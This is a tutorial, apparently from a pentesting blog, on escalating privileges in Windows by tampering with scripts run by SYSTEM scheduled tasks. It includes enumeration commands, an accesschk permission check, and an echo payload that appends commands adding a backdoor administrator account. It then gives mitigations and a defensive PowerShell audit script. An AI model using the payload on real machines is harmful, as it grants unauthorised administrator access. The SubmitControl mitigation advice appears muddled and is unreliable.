Exploiting Scheduled Tasks
What Are Scheduled Tasks?
Scheduled Tasks in Windows are automated processes that run at specific times or in response to events, allowing you to schedule programs, scripts, or commands to run without manual input. They help automate jobs such as backups, updates, or cleanup, triggered by time or by system events. Managed via Task Scheduler or schtasks, they save time, improve efficiency, and simplify task management. Examples include running cleanup scripts, launching apps at startup, or sending reminders. Use Task Scheduler to create and manage tasks on your system.
Manual Enumeration
For manual enumeration we can use schtasks:
schtasks /query /fo LIST /V
This lists every scheduled task with its full details; the /V switch adds the verbose fields, including "Run As User" (the account the task runs under) and "Task To Run" (the program or script it executes).
Or with PowerShell:
Get-ScheduledTask | Where-Object {$_.Principal.UserId -notlike "*SYSTEM"} | Format-List
Automated Enumeration
Exploitation
First we must make sure of two things: that we can modify or write to the script or binary the targeted task executes, and that the targeted task runs with high privileges (for example as SYSTEM)! Check the file's permissions with accesschk:
accesschk.exe /accepteula -quvw C:\DevTools\CleanUp.ps1
If FILE_WRITE_DATA is listed, you can modify the content of the file (you have write access). If FILE_APPEND_DATA is listed, you can append data to the file but may not be able to overwrite its existing content.
Nice. We can embed code in the script; you can do whatever you want, I will add a user with high privileges:
echo "net user xle0x Password123! /add && timeout /t 5 && net localgroup Administrators xle0x /add" >> C:\DevTools\CleanUp.ps1
Then just wait for the task to run at its scheduled time, and you will see a new user created with high privileges.
Mitigation
- Perform an audit scan to find weak permissions or misconfigurations with the help of automated tools such as WinPEAS, SharpUp, etc.
- Make sure the scheduled task does not run as SYSTEM. Configure scheduled tasks to execute as the authenticated account instead of SYSTEM. The associated registry key is HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to Disabled.
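As an added audit example (not code from the original post), the following PowerShell script combines the manual enumeration above with the write-permission check from the Exploitation section, seen from the auditor's side: it lists enabled tasks that run as SYSTEM (or with the highest run level) whose action executable or script can be written by low-privileged groups. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later) and that the names in $highPrivPrincipals and $weakIdentities, which are my own starting set, fit your environment; adjust them as needed. Run it from an elevated prompt so that every task definition and ACL is readable.

```powershell
# Added audit example (not from the original post): report scheduled tasks that run
# under a high-privilege principal and whose on-disk action target (executable or
# script) is writable by non-administrative identities.
# Assumes Windows PowerShell 5.1+ with the ScheduledTasks module.

# Principals treated as "high privilege" for this audit (assumption; extend as needed).
$highPrivPrincipals = @('SYSTEM', 'NT AUTHORITY\SYSTEM', 'LocalSystem', 'S-1-5-18',
                        'Administrator', 'BUILTIN\Administrators')

# Identities whose write access to a task's target makes the task a privilege-escalation risk.
$weakIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                    'NT AUTHORITY\INTERACTIVE')

# Any of these rights lets the holder change or append to the file (cf. FILE_WRITE_DATA / FILE_APPEND_DATA).
$writeRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor `
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor `
               [System.Security.AccessControl.FileSystemRights]::Write -bor `
               [System.Security.AccessControl.FileSystemRights]::Modify -bor `
               [System.Security.AccessControl.FileSystemRights]::FullControl

function Resolve-TaskActionPaths {
    # Returns every existing file a task action points at: the Execute target itself
    # and any script path passed in Arguments (e.g. powershell.exe -File C:\DevTools\CleanUp.ps1).
    param($Task)
    foreach ($action in $Task.Actions) {
        if (-not $action.Execute) { continue }
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
        if (Test-Path -LiteralPath $exe) { $exe }
        if ($action.Arguments) {
            # Simple path matcher; paths containing spaces are not matched (assumption).
            foreach ($m in [regex]::Matches($action.Arguments, '[A-Za-z]:\\[^\s"]+\.(ps1|bat|cmd|vbs|exe)')) {
                $p = [Environment]::ExpandEnvironmentVariables($m.Value)
                if (Test-Path -LiteralPath $p) { $p }
            }
        }
    }
}

function Test-WeakWriteAccess {
    # Returns the first low-privileged identity holding a write-type Allow ACE on $Path, else $null.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeRights) -ne 0) { return $ace.IdentityReference.Value }
    }
    return $null
}

Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
    $task  = $_
    $runAs = $task.Principal.UserId
    # Only tasks that would hand an attacker elevated privileges are interesting.
    if ($highPrivPrincipals -notcontains $runAs -and $task.Principal.RunLevel -ne 'Highest') { return }
    foreach ($path in Resolve-TaskActionPaths -Task $task) {
        $writer = Test-WeakWriteAccess -Path $path
        if ($writer) {
            [pscustomobject]@{
                TaskPath   = $task.TaskPath
                TaskName   = $task.TaskName
                RunsAs     = $runAs
                Target     = $path
                WritableBy = $writer
            }
        }
    }
} | Format-Table -AutoSize
```

Each row in the output is a task to fix: either tighten the ACL on the target file so that only administrators can write it, or, per the mitigation list above, change the task's principal so it no longer runs as SYSTEM. Tasks whose targets live under %SystemRoot% or Program Files normally produce no rows, so any hit under a custom directory such as C:\DevTools deserves a closer look.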